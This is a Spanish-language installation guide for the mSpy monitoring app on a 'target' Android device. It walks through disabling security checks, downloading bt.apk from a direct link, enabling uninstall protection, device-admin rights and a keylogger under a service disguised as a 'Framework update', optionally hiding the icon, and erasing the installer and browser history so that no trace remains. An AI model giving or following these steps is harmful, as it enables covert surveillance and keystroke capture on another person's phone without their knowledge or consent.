La instalación en los dispositivos Android

Para instalar mSpy en el dispositivo Android objetivo es necesario tener ese dispositivo en sus manos y una conexión a Internet debe estar disponible.

Es importante entender que, debido al alto nivel de personalización del sistema operativo Android, los pasos de la siguiente guía pueden variar dependiendo del modelo de su dispositivo. Sin embargo, la mayoría de los menús son similares y usted será capaz de encontrarlos fácilmente. Por ejemplo, en lugar de “Aplicaciones” es posible que vea “Apps”, “Gestor de aplicaciones” o “Administrador de aplicaciones”.

Preparativos

Antes de comenzar la instalación, por favor asegúrese de que en el dispositivo de destino en Ajustes → Seguridad, hay una marca de verificación junto a fuentes desconocidas. También se recomienda para eliminar una marca de verificación de Verificar aplicaciones.

install1span Install2span install3span install4span

Nota: En la versión Android 5.0+ Verificar aplicaciones opción se encuentra en Google Ajustes → Seguridad

span1 span2 span3

Descárguelo!

1. En la pantalla de inicio abra todas las apps (lista de todas las aplicaciones disponibles) y seleccione un Chrome.

install5span install6span

2. Una vez que vea la página de inicio del Chrome, deslice el dedo desde el medio de la pantalla ligeramente hacia la parte inferior para hacer que la barra de direcciones aparezca en la parte superior. Borre todo e ingrese http://a22z.net/a, la dirección exacta está disponible en su cuenta mSpy en el asistente de instalación) y pulse Ir desde el teclado.

captcha1 captcha2 captcha3

Tenga en cuenta: http://a22z.net/a son un enlace de descarga directa que no abren nuevas páginas web, sino que simplemente se inicia la descarga en el fondo (un pequeño mensaje debe emerger informándole que se inicia la descarga).

3. Ahora puede volver al listado de todas las aplicaciones desde la pantalla de Inicio y seleccionar Descargas, donde podrá ver el archivo bt.apk. Toque en el archivo bt.apk y la instalación comenzará.

install10span install11span

Instálelo!

1. Después de abrir el archivo bt.apk tendrá que seguir la secuencia: Siguiente → Instalar → Abrir

install12span install13span install14span

2. Lea un contrato de licencia de usuario final detenidamente, coloque marca de verificación junto a Aceptar acuerdo de licencia para continuar.

3. Active la opción “Prevenir desinstalación”

4. Presione el botón Activar para evitar la eliminación y activar el administrador del dispositivo. 5. Active la opción “Seguimiento de Keylogger”, le enviará a la nueva ventana & gt; toque en el servicio de actualización de Framework y enciéndalo. 6. Active la opción “Permitir recopilación de datos”, se lo enviará a la nueva ventana & gt; toque en el servicio de actualización de Framework & gt; Permitir acceso al uso 7. Seleccione si desea que el icono esté visible
es

Instalación terminada!

Borrar historial del navegador y el paquete de instalación

Ahora puede eliminar el archivo bt.apk de las Descargas. Seleccione el archivo (o toque y mantenga) y verá el signo contenedor de basura en la parte superior. Dé un toque para borrar el archivo seleccionado.

install10span install25span

También puede borrar el historial de navegación, dirigiéndose al navegador → botón Menú → Configuración → Seguridad y privacidad → Borrar historial de navegación.

install26span install27span install28span install29span

install30span

Y ya no hay ningún rastro de mSpy en el dispositivo objetivo!